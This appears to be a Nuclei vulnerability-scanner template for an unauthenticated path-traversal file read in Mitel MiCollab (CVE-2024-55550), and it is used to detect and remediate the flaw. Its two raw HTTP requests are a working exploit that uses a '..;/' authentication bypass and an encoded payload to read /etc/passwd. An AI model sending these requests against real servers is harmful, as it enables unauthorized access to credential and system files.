id: CVE-2024-55550

info:
  name: Mitel MiCollab - Arbitary File Read
  author: DhiyaneshDk,watchTowr
  severity: critical
  description: |
    The Mitel Collab Arbitrary File Read vulnerability allows an unauthenticated attacker to read arbitrary files from the underlying file system on a Mitel Collab server. Exploiting this flaw involves sending specially crafted requests to the server, bypassing access controls and allowing the attacker to retrieve sensitive files.
  impact: |
    Unauthenticated attackers can bypass authentication and exploit path traversal to read arbitrary files from the MiCollab server, exposing sensitive configuration, credentials, and system data.
  remediation: |
    Update Mitel MiCollab according to MISA-2024-0029 advisory to address the authentication bypass and path traversal vulnerabilities.
  reference:
    - https://github.com/watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
  classification:
    cve-id: CVE-2024-55550
    cwe-id: CWE-22
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.4
    epss-score: 0.17725
    epss-percentile: 0.95239
    cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:*:-:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mitel
    product: cmg_suite
    shodan-query: http.html:"Mitel Networks"
    fofa-query: body="mitel networks"
  tags: cve,cve2024,mitel,lfi,cmg-suite,auth-bypass,kev,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "users"
          - "Network Element"
        condition: and
        internal: true

  - raw:
      - |
        POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _transaction=%3Ctransaction+xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2F10%2FXMLSchema-instance%22+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CtransactionNum+xsi%3Atype%3D%22xsd%3Along%22%3E2%3C%2FtransactionNum%3E%3Coperations+xsi%3Atype%3D%22xsd%3AList%22%3E%3Celem+xsi%3Atype%3D%22xsd%3AObject%22%3E%3Ccriteria+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3E..%2F..%2F..%2Fetc%2Fpasswd%3C%2FreportName%3E%3C%2Fcriteria%3E%3CoperationConfig+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CdataSource%3Esummary_reports%3C%2FdataSource%3E%3CoperationType%3Efetch%3C%2FoperationType%3E%3C%2FoperationConfig%3E%3CappID%3EbuiltinApplication%3C%2FappID%3E%3Coperation%3EdownloadReport%3C%2Foperation%3E%3ColdValues+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3Ex.txt%3C%2FreportName%3E%3C%2FoldValues%3E%3C%2Felem%3E%3C%2Foperations%3E%3Cjscallback%3Ex%3C%2Fjscallback%3E%3C%2Ftransaction%3E&protocolVersion=1.0&__iframeTarget__=x

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "micollab_api:.*:.*"
# digest: 4a0a00473045022020acb589a85eeaf04a006aca1ee8e28c04cfd580db8b7c00afcbac6d98bf5d0f022100e0c46500a23f172dc9b9301da9b4d92712f9915aca295bdac54b8aa84ed6a6fe:922c64590222798bb761d5b6d8e72950